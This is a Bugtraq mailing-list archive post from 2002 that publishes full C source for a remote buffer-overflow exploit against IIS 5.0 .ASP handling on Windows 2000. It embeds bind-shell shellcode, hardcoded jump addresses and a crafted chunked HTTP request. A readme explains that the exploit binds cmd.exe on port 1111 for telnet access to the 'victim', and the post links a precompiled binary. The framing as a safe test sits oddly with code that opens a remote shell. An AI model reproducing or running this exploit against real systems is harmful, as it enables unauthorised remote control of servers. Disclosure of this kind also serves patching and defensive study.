Bugtraq mailing list archives
Windows 2000 Server IIS 5.0 .ASP Overflow Exploit
From: CHINANSL Security Team <lovehacker () chinansl com>
Date: 4 May 2002 15:42:52 -0000
Summary: ======== The following code will allow you to safely test your system for the below motioned vulnerability. For more information about this vulnerability see http://www.eeye.com/html/press/PR20020410.html previous article:"windows 2000 and NT4 IIS .ASP Buffer Overflow". The following code comes from CHINANSL TECHNOLOGY CO.,LTD. For more information about our company see http://www.chinansl.com. Exploit: ======== --------------------CUT HERE-------------------------------- /* Windows 2000 Server Exploit By CHINANSL Security Team. Test on Windows 2000 Chinese Version, IIS 5.0 , not patched. Warning:THIS PROGRAM WILL ONLY TEST. CHINANSL Technology CO.,LTD http://www.chinansl.com keji () chinansl com */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #pragma comment (lib,"Ws2_32") int main(int argc, char* argv[]) { if(argc != 4) { printf("%s ip port aspfilepath\n\n",argv [0]); printf(" ie. %s 127.0.0.1 80 /iisstart.asp\n",argv[0]); puts(" programed by keji () chinansl com"); return 0; } DWORD srcdata=0x01e2fb1c-4;//0x00457474; //address of SHELLCODE DWORD jmpaddr=0x00457494;//0x77ebf094;//0x01e6fcec;//"\x1c\xfb\xe6 \x01";///"\x0c\xfb\xe6\x01"; char* destIP=argv[1]; char* destFile=argv[3]; int webport=atoi(argv[2]); char* pad="\xcc\xcc\xcc\xcc" "ADPA" "\x02\x02\x02 \x02" "PADP"; //16 bytes WSADATA ws; SOCKET s; long result=0; if(WSAStartup(0x0101,&ws) != 0) { puts("WSAStartup() error"); return -1; } struct sockaddr_in addr; addr.sin_family=AF_INET; addr.sin_port=htons(webport); addr.sin_addr.s_addr=inet_addr(destIP); s=socket(AF_INET,SOCK_STREAM,0); if(s==-1) { puts("Socket create error"); return -1; } if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1) { puts("Cannot connect to the specified host"); return -1; } char buff[4096]; char* shellcode= "\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x03\xe0\x8b\xfc\x33 \xc9\x89" "\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\x65 \x6c\x33\x32" "\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\x33\x32 \x2e\xab" "\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\xab\x32 \xc0\x4f" "\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\x53 \xff\xd0\x89" "\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\xff\x53 \xff\xd0" "\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75 \xfc\xff\xd3\x89" "\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\x33\xf6 \x66\xbe" "\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66 \xbe\x3e\x02\x56" "\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\x56 \xff\x75\xfc" "\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75 \xfc\xff\xd3\x89" "\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75 \xfc\xff\xd3\x89" "\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75 \xfc\xff\xd3\x89" "\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\x89\x45 \xe0\x6a" "\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\x75\xf8 \xff\xd3" "\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\xff\xd3 \x89\x45" "\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\x13 \xff\x75\xf8" "\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\x89\x45 \xc8\x6a" "\x03\xff\x75\xf8\xff\xd3\x89\x85 \x1c\xff\xff\xff\x8d\x7d\xa0\x32" "\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\xc0 \xab\xf7\xd0" "\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\xc8 \xab\x33\xc0" "\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\x01\x50 \xff\x55" "\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\x45\xc4 \x6a\x10" "\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\xff\x75 \xc4\xff" "\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\x89\x45 \xc0\x33" "\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\x9c\x50 \xff\x55" "\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\x8d\x45 \x94\x50" "\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\xb1\x44 \x32\xc0" "\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\x01\x01 \x89\x47" "\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\x40\x89 \x47\x3c" "\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\x8d\x85 \x38\xff" "\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\x80\x51 \x53\xff" "\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34 \xff\xff\xff\x89" "\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85 \x2c\xff\xff\xff\x50" "\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85 \x2c\xff\xff\xff\x85" "\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85 \x2c\xff\xff\xff\x50\x53" "\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\x85\xc0 \x74\x6d" "\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff\xff\xff" "\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\x90\x90 \x90\x90" "\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\x90\x90 \x33\xc0" "\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\xc0 \xff\x55\xc8" "\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\xc0\x50 \x8d\x85" "\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30 \xff\xff" "\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\xb4 \xff\x75\xc4" "\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95 \x1c\xff\xff\xff\x6a" "\xff\xff\x95\x18\xff\xff\xff"; char* s1="POST ";// HTTP/1.1\r\n"; char* s2="Accept: */*\r\n"; char* s4="Content-Type: application/x-www- form-urlencoded\r\n"; char* s5="Transfer-Encoding: chunked\r\n\r\n"; char* sc="0\r\n\r\n\r\n"; char shellcodebuff[1024*8]; memset(shellcodebuff,0x90,sizeof (shellcodebuff)); memcpy(&shellcodebuff[sizeof(shellcodebuff)- strlen(shellcode)-1],shellcode,strlen(shellcode)); shellcodebuff[sizeof(shellcodebuff)-1] = 0; char sendbuff[1024*16]; memset(sendbuff,0,1024*16); sprintf(sendbuff,"%s%s?%s HTTP/1.1\r\n%sHost: % s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n% s",s1,destFile,shellcodebuff,s2,destIP,s4,s5,pad/*,srcdata,j mpaddr*/,sc); int sendlen=strlen(sendbuff); *(DWORD *)strstr(sendbuff,"BBBB") = jmpaddr; *(DWORD *)strstr(sendbuff,"AAAA") = srcdata; result=send(s,sendbuff,sendlen,0); if(result == -1 ) { puts("Send shellcode error!"); return -1; } memset(buff,0,4096); result=recv(s,buff,sizeof(buff),0); if(strstr(buff,"<html>") != NULL) { shutdown(s,0); closesocket(s); puts("Send shellcode error!Try again!"); return -1; } shutdown(s,0); closesocket(s); printf("\nUse <telnet %s 1111> to connect to the host\n",destIP); puts("If you cannot connect to the host,try run this program again!"); return 0; } ---------------------------End------------------------------ Readme: ======= This .asp overflow exploit will open port 1111 and bind the cmd.exe.One thing should be noted is that everytime you run this exploit and a message will show that this exploit works perfectly,but that doesn't mean you can get the access to the target host,the reason is that on some occasions there will be a message-box appear on victim's terminal screen showing that an AV(Accesee Violation) has occured.anyhow,this dialog should be closed by recipient otherwise you can not gaining the access even if you continue your attack. Download: ========= http://download.chinansl.com/aspexploit.exe Solution: ========= patch:http://www.microsoft.com/Downloads/Release.asp? ReleaseID=37824 Reference: ========== Copyright 2001-2002 CHINANSL. All Rights Reserved. This Information comes from CHINANSL TECHNOLOGY CO.,LTD. It can be transshipped. But please guarantee the completion of the article, otherwise we will pursue the rights of the law. www.chinansl.com lovehacker () chinansl com
Current thread:
- Windows 2000 Server IIS 5.0 .ASP Overflow Exploit CHINANSL Security Team (May 04)